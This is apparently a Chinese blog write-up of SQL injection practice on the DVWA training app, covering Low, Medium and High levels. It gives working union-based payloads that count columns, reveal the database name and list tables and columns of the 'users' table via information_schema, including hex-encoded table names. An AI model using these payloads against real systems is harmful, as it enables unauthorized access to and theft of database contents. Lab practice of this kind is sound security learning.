DVWA1_SQL Injection

最新推荐文章于 2024-05-20 12:07:48 发布
最新推荐文章于 2024-05-20 12:07:48 发布
阅读量685 收藏 5
点赞数
文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/123383099
版权

一、 SQL注入原理

二、 SQL注入挖掘(显错)

三、 DVWA_SQL Injection

Low

Medium

High

一、 SQL注入原理

SQL注入,是指用户输入的数据拼接恶意SQL语句,未进行检验及过滤处理,攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。

二、 SQL注入挖掘(显错)

  1. 判断是否存在注入,字符型或数字型
  2. 猜解字段长
  3. 判断显错点
  4. 获取库、表、字段

三、 DVWA_SQL Injection

Low

Low后端源码未对参数id进行任何检验及过滤,明显存在SQL注入

漏洞复现

1. 判断是否存在注入,类型

#1

#4’-’3

测试,返回结果同上,可判断存在sql字符型注入

2. 判断表字段长

#1'  order by  2 --

返回正常

 #1'  order by  3 --

返回Unknown column '3' in 'order clause',可判断表字段长为2

3. 判断显错点

#1.1' union select 6,8 --

返回显示均可利用

 

4. 查询库名

#1.1' union select database(),8 --

查询库名’dvwa’

 可依次查询表、字段

#1.1' union select 6,group_concat(table_name) from information_schema.tables where table_schema=database() --

 #1.1' union select 6,group_concat(column_name) from information_schema.columns where table_name=’users’ --

Medium

medium后端源码使用mysqli_real_escape_string对参数id输入进行投射字符转义,且增加了下拉框,可抓包修改参数

 #mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。

漏洞复现

1.判断是否存在注入,类型

#1

#4-3

测试,返回结果同上,可判断存在sql数字型注入

 

2.判断表字段长

#1 order by  2 --

返回正常

#1'  order by  3 --

返回Unknown column '3' in 'order clause',可判断表字段长为2

3.判断显错点

#1.1 union select 6,8 --

返回显示均可利用

 

4.查询库名

#1.1 union select database(),8 --

查询库名’dvwa’

可依次查询表、字段(特殊字符16进制编码即可)

#1.1 union select 6,group_concat(table_name) from information_schema.tables where table_schema=database() --

#1.1 union select 6,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --

High

High可以看到,与Medium级别的代码相比,High级别的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。

 

漏洞复现

测试和low没啥区别

1.判断是否存在注入,类型

#1

 #2’-’1

测试,返回结果同上,可判断存在sql字符型注入

 

2.判断表字段长

#1'  order by 2 --

返回正常

#1'  order by  3 --

返回Unknown column '3' in 'order clause',可判断表字段长为2

3.判断显错点

#1.1' union select 6,8 --

4.查询库名

#1.1' union select database(),8 --

可依次查询表、字段

#1.1' union select 6,group_concat(table_name) from information_schema.tables where table_schema=database() --

#1.1' union select 6,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --

Revenge_scan
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA下的SQL Injection(Blind)
07-25
盲注
DVWA[SQL-Injection]报错注入学习记录
nareku的博客
07-06 504
还是以sql-injection为例爆个库:输入查询语句: 得到数据库库名为dvwa爆个表名: 接下来还是爆users表里面的user和password字段。在使用updatexml()这个函数的时候有需要注意的地方,具体参考:传送门输入查询语句: 因为updatexml只支持32位的报错,因此最好一行一行地使用 concat limit 与substr 逐个爆破,调一下参数就行联合一下前面的,就可以得到user和password...
DVWA_SQL_Injection_Blind_medium
qq_45434762的博客
01-09 422
1.判断注入点 通过and 1=1判断注入点是否存在 2.猜解数据库名长度 3.猜解数据库名 通过ASCII对照表第一个字符为d 第二个字符为v 第三个字符为w 第四个字符为a 数据库名为dvwa 4.猜解数据库中表的数量 可以看出数据库中有两个表 5.猜解第一张表的长度 第一张表名长度为9 6.猜解第一张...
DVWA2_SQL Injection (Blind)
weixin_44193247的博客
03-09 440
DVWA漏洞复现练习篇
DVWA_SQL Injection(low)
qq_45434762的博客
10-10 145
一、手注 1.判断是否存在SQL注入漏洞及类型 2.求判断列数 3.求显示位 3.表库名,用户名等信息 4.爆表名 5.爆列名 6.拖库 7.结果验证 二、sqlmap注入 1.查找数据库用户,数据库库名 语句: sqlmap-u"http://192.168.126.147/DVWA-master/v...
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
DVWA_Tool.rar
02-13
Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业...DVWA的目标是通过简单直接的界面练习一些最常见的Web漏洞,具有各种难度。请注意,此软件存在记录和未记录的漏洞。
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
dvwa_owasp_zap_config
05-25
dvwa_owasp_zap_config
SQL进阶(六):通关题:制作一个活动日历
qq_33489955的博客
05-15 577
就是求当月的最后一天是周几,周六算1天,周日算两天SELECT(CASEELSE 0FROMGROUP BYyear_monthSELECTFROM[(5,)]a4 = '5' # 在 '' 中填入你的结果,如 a4 = '5' 代表有个 5 个周末(周六,周日分开计算,例如 2个周六 和 3个周日 = 5个周末)
this is incompatible with sql_mode=only_full_group_by
weixin_60435181的博客
05-16 214
this is incompatible with sql_mode=only_full_group_by
PostgreSQL查看sql的执行计划
lee_vincent1的博客
05-16 552
在PostgreSQL中,查看SQL查询的执行计划是性能调优和问题诊断的重要步骤。PostgreSQL提供了一个叫做EXPLAIN的命令,可以让你查看查询的执行计划。通过EXPLAIN命令,你可以看到查询将如何执行,包括访问表的方法和使用的索引,预计的执行成本等。
【postgresql】PostgreSQL中的pgrowlocks插件介绍
hdhdhdk的博客
05-16 645
pgrowlocks是一个PostgreSQL的贡献者扩展,它扩展了标准的锁监控功能,允许用户查询特定表的行级锁信息。与pg_locks系统视图相比,pgrowlocks提供了更加细化的锁状态视图,能够显示哪些行被哪些事务锁定,这对于排查锁冲突、优化查询计划和调整并发控制策略至关重要。
OceanBase SQL 诊断和调优实践——【DBA从入门到实践】第七期
最新发布
OceanBase分布式数据库的博客
05-20 1082
《DBA 从入门到实践》第七期在5月22日(周三)如期而至,为大家讲解:ODP(OceanBase Database Proxy) SQL 路由原理;如何分析 SQL 监控视图;如何阅读和管理 OceanBase SQL 执行计划;最常见的 SQL 调优方式;SQL 性能问题的典型场景和排查思路。
1、sql server数据库进行sql注入
weixin_51520483的博客
05-15 830
1、判断数据类型是很重要的一点,影响后面的注入语句2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形。
小白也会SQL:大模型改变交互方式(中)
鲁班模锤
05-17 765
在人工智能与自然语言处理交汇点,有一种技术正悄然改变与数据交互的方式——将日常语言转化为精准SQL查询。这一“text-to-sql”转换任务,使非专业人士也能轻松驾驭复杂的数据库操作,极大地拓宽了数据应用的边界。
写SQL的心得
weixin_64842400的博客
05-11 651
接着,系统按照 GROUP BY 子句中的指定字段分组,并对每个分组进行计算,生成虚拟的分组结果表。执行顺序 :from > on > where > group by > having > select > distinct > order by > top。4、聚合函数本质:对指定的列进行聚合,如果我们用了group by,我们可以对每个分组应用内聚合函数。在分组内部,聚合函数会自动处理所有重复的行。具体来说,在执行 SELECT 子句时,系统先计算 SELECT 中的列表达式和函数等,然后。
SqlSugar生成数据库和数据表
一杯浊酒笑风尘
05-19 113
SqlSugar生成数据库和数据表
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值